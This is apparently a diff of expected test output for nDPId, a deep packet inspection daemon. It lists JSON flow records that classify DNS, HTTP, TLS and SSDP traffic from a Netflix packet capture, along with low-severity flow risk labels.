-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 